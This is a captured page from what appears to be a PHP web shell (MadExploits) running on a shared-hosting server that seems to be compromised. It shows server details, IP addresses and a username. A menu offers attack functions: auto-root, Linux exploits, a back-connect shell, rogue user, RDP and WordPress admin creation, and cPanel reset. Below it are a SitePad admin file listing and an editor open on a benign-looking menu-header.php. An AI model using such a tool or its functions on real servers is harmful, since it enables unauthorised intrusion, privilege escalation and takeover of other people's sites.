Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.144.114.8
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
sitepad /
editor /
site-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
admin-ajax.php
4.32
KB
-rw-r--r--
admin-footer.php
2.3
KB
-rw-r--r--
admin-header.php
13.74
KB
-rw-r--r--
admin-post.php
1.66
KB
-rw-r--r--
admin.php
11.1
KB
-rw-r--r--
async-upload.php
3.63
KB
-rw-r--r--
comment.php
10.66
KB
-rw-r--r--
cookie-consent.php
17.06
KB
-rw-r--r--
custom-background.php
20.06
KB
-rw-r--r--
custom-header.php
46.28
KB
-rw-r--r--
customize.php
8.69
KB
-rw-r--r--
edit-form-advanced.php
30.63
KB
-rw-r--r--
edit-form-blocks.php
12.82
KB
-rw-r--r--
edit-form-comment.php
7.32
KB
-rw-r--r--
edit-tag-form.php
9.28
KB
-rw-r--r--
edit-tags.php
21.41
KB
-rw-r--r--
edit.php
21.76
KB
-rw-r--r--
export.php
10.69
KB
-rw-r--r--
features.php
3.22
KB
-rw-r--r--
google-analytics.php
2.79
KB
-rw-r--r--
import.php
7.28
KB
-rw-r--r--
index.php
12.53
KB
-rw-r--r--
load-scripts.php
1.62
KB
-rw-r--r--
load-styles.php
2.27
KB
-rw-r--r--
mailchimp.php
4.51
KB
-rw-r--r--
media-new.php
3.12
KB
-rw-r--r--
media-upload.php
3.3
KB
-rw-r--r--
media.php
5.54
KB
-rw-r--r--
menu-header.php
7.63
KB
-rw-r--r--
menu.php
9.82
KB
-rw-r--r--
nav-menus.php
38.34
KB
-rw-r--r--
options-discussion.php
14.83
KB
-rw-r--r--
options-general.php
15.83
KB
-rw-r--r--
options-head.php
492
B
-rw-r--r--
options-media.php
6.05
KB
-rw-r--r--
options-permalink.php
9.34
KB
-rw-r--r--
options-reading.php
9.05
KB
-rw-r--r--
options.php
11.6
KB
-rw-r--r--
plans.php
9.21
KB
-rw-r--r--
post-new.php
3.56
KB
-rw-r--r--
post.php
10.65
KB
-rw-r--r--
privacy.php
6.81
KB
-rw-r--r--
profile.php
298
B
-rw-r--r--
revision.php
5.06
KB
-rw-r--r--
seo.php
3.98
KB
-rw-r--r--
setup.php
22.96
KB
-rw-r--r--
sitemap.php
7.88
KB
-rw-r--r--
smtp-mail.php
12.7
KB
-rw-r--r--
term.php
2.07
KB
-rw-r--r--
themes.php
20.72
KB
-rw-r--r--
themes_setup.php
18.26
KB
-rw-r--r--
upload.php
13.46
KB
-rw-r--r--
user-edit.php
21.36
KB
-rw-r--r--
user-new.php
21.56
KB
-rw-r--r--
users.php
18.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu-header.php
<?php /** * Displays Administration Menu. * * @package WordPress * @subpackage Administration */ /** * The current page. * * @global string $self */ $self = preg_replace( '|^.*/site-admin/network/|i', '', $_SERVER['PHP_SELF'] ); $self = preg_replace( '|^.*/site-admin/|i', '', $self ); $self = preg_replace( '|^.*/plugins/|i', '', $self ); $self = preg_replace( '|^.*/mu-plugins/|i', '', $self ); /** * For when admin-header is included from within a function. * * @global array $menu * @global array $submenu * @global string $parent_file * @global string $submenu_file */ global $menu, $submenu, $parent_file, $submenu_file; /** * Filters the parent file of an admin menu sub-menu item. * * Allows plugins to move sub-menu items around. * * @since MU (3.0.0) * * @param string $parent_file The parent file. */ $parent_file = apply_filters( 'parent_file', $parent_file ); /** * Filters the file of an admin menu sub-menu item. * * @since 4.4.0 * * @param string $submenu_file The submenu file. * @param string $parent_file The submenu item's parent file. */ $submenu_file = apply_filters( 'submenu_file', $submenu_file, $parent_file ); get_admin_page_parent(); /** * Display menu. * * @access private * @since 2.7.0 * * @global string $self * @global string $parent_file * @global string $submenu_file * @global string $plugin_page * @global string $typenow * * @param array $menu * @param array $submenu * @param bool $submenu_as_parent */ function _wp_menu_output( $menu, $submenu, $submenu_as_parent = true ) { global $self, $parent_file, $submenu_file, $plugin_page, $typenow; $first = true; // 0 = menu_title, 1 = capability, 2 = menu_slug, 3 = page_title, 4 = classes, 5 = hookname, 6 = icon_url foreach ( $menu as $key => $item ) { $admin_is_parent = false; $class = array('site-nav-link'); $aria_attributes = ''; $aria_hidden = ''; $is_separator = false; if ( $first ) { $class[] = 'sp-first-item'; $first = false; } $submenu_items = array(); if ( ! empty( $submenu[ $item[2] ] ) ) { $class[] = 'sp-has-submenu'; $submenu_items = $submenu[ $item[2] ]; } if ( ( $parent_file && $item[2] == $parent_file ) || ( empty( $typenow ) && $self == $item[2] ) ) { if ( ! empty( $submenu_items ) ) { $class[] = 'sp-has-current-submenu sp-menu-open'; } else { $class[] = 'active'; $aria_attributes .= 'aria-current="page"'; } } else { $class[] = 'sp-not-current-submenu'; if ( ! empty( $submenu_items ) ) { $aria_attributes .= 'aria-haspopup="true"'; } } if ( ! empty( $item[4] ) ) { $class[] = esc_attr( $item[4] ); $class[] = 'site-nav-link'; } $class = $class ? ' class="' . join( ' ', $class ) . '"' : ''; $id = ! empty( $item[5] ) ? ' id="' . preg_replace( '|[^a-zA-Z0-9_:.]|', '-', $item[5] ) . '"' : ''; $img = $img_style = ''; $img_class = ' dashicons-before'; if ( false !== strpos( $item[4], 'wp-menu-separator' ) ) { $is_separator = true; } /* * If the string 'none' (previously 'div') is passed instead of a URL, don't output * the default menu image so an icon can be added to div.wp-menu-image as background * with CSS. Dashicons and base64-encoded data:image/svg_xml URIs are also handled * as special cases. */ if ( ! empty( $item[6] ) ) { $img = '<img src="' . $item[6] . '" alt="" />'; if ( 'none' === $item[6] || 'div' === $item[6] ) { $img = '<br />'; } elseif ( 0 === strpos( $item[6], 'data:image/svg+xml;base64,' ) ) { $img = '<br />'; $img_style = ' style="background-image:url(\'' . esc_attr( $item[6] ) . '\')"'; $img_class = ' svg'; } elseif ( 0 === strpos( $item[6], 'dashicons-' ) ) { $img = '<br />'; $img_class = ' dashicons-before ' . sanitize_html_class( $item[6] ); } } $arrow = ''; $title = wptexturize( $item[0] ); // Hide separators from screen readers. if ( $is_separator ) { continue; $aria_hidden = ' aria-hidden="true"'; } echo "\n\t".'<li>'; if ( $is_separator ) { //echo '<div class="separator"></div>'; } elseif ( ! empty( $item[2] ) && current_user_can( $item[1] ) ) { $menu_hook = get_plugin_page_hook( $item[2], 'admin.php' ); $menu_file = $item[2]; if ( false !== ( $pos = strpos( $menu_file, '?' ) ) ) { $menu_file = substr( $menu_file, 0, $pos ); } if ( ! empty( $menu_hook ) || ( ( 'index.php' != $item[2] ) && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! file_exists( ABSPATH . "/site-admin/$menu_file" ) ) ) { $admin_is_parent = true; $href = admin_url('admin.php?page='.$item[2]); } else { $href = admin_url($item[2]); } if(!empty($submenu_items)){ $href = 'javascript:void(0)'; } echo "\n\t<a href='$href'$class $aria_attributes>$arrow<div class='sp-menu-image$img_class'$img_style>$img</div><span class='site-label'>{$item[0]}</span></a>"; } if ( ! empty( $submenu_items ) ) { echo "\n\t".'<ul class="site-sub-nav">'; $first = true; // 0 = menu_title, 1 = capability, 2 = menu_slug, 3 = page_title, 4 = classes foreach ( $submenu_items as $sub_key => $sub_item ) { if ( ! current_user_can( $sub_item[1] ) ) { continue; } $class = array('site-nav-link'); $aria_attributes = ''; if ( $first ) { $class[] = 'sp-first-item'; $first = false; } $menu_file = $item[2]; if ( false !== ( $pos = strpos( $menu_file, '?' ) ) ) { $menu_file = substr( $menu_file, 0, $pos ); } // Handle current for post_type=post|page|foo pages, which won't match $self. $self_type = ! empty( $typenow ) ? $self . '?post_type=' . $typenow : 'nothing'; if ( isset( $submenu_file ) ) { if ( $submenu_file == $sub_item[2] ) { $class[] = 'active'; $aria_attributes .= ' aria-current="page"'; } // If plugin_page is set the parent must either match the current page or not physically exist. // This allows plugin pages with the same hook to exist under different parents. } elseif ( ( ! isset( $plugin_page ) && $self == $sub_item[2] ) || ( isset( $plugin_page ) && $plugin_page == $sub_item[2] && ( $item[2] == $self_type || $item[2] == $self || file_exists( $menu_file ) === false ) ) ) { $class[] = 'active'; $aria_attributes .= ' aria-current="page"'; } if ( ! empty( $sub_item[4] ) ) { $class[] = esc_attr( $sub_item[4] ); } $class = $class ? ' class="'.join(' ', $class).'"' : ''; $menu_hook = get_plugin_page_hook( $sub_item[2], $item[2] ); $sub_file = $sub_item[2]; if ( false !== ( $pos = strpos( $sub_file, '?' ) ) ) { $sub_file = substr( $sub_file, 0, $pos ); } $title = wptexturize( $sub_item[0] ); if ( ! empty( $menu_hook ) || ( ( 'index.php' != $sub_item[2] ) && file_exists( WP_PLUGIN_DIR . "/$sub_file" ) && ! file_exists( ABSPATH . "/site-admin/$sub_file" ) ) ) { // If admin.php is the current page or if the parent exists as a file in the plugins or admin dir if ( ( ! $admin_is_parent && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! is_dir( WP_PLUGIN_DIR . "/{$item[2]}" ) ) || file_exists( $menu_file ) ) { $sub_item_url = add_query_arg( array( 'page' => $sub_item[2] ), $item[2] ); } else { $sub_item_url = add_query_arg( array( 'page' => $sub_item[2] ), 'admin.php' ); } $href = esc_url( $sub_item_url ); } else { $href = $sub_item[2]; } echo "<li><a href='$href'$class$aria_attributes>$title</a></li>"; } echo '</ul>'; } echo '</li>'; } } _wp_menu_output( $menu, $submenu ); /** * Fires after the admin menu has been output. * * @since 2.5.0 */ do_action( 'adminmenu' );
Close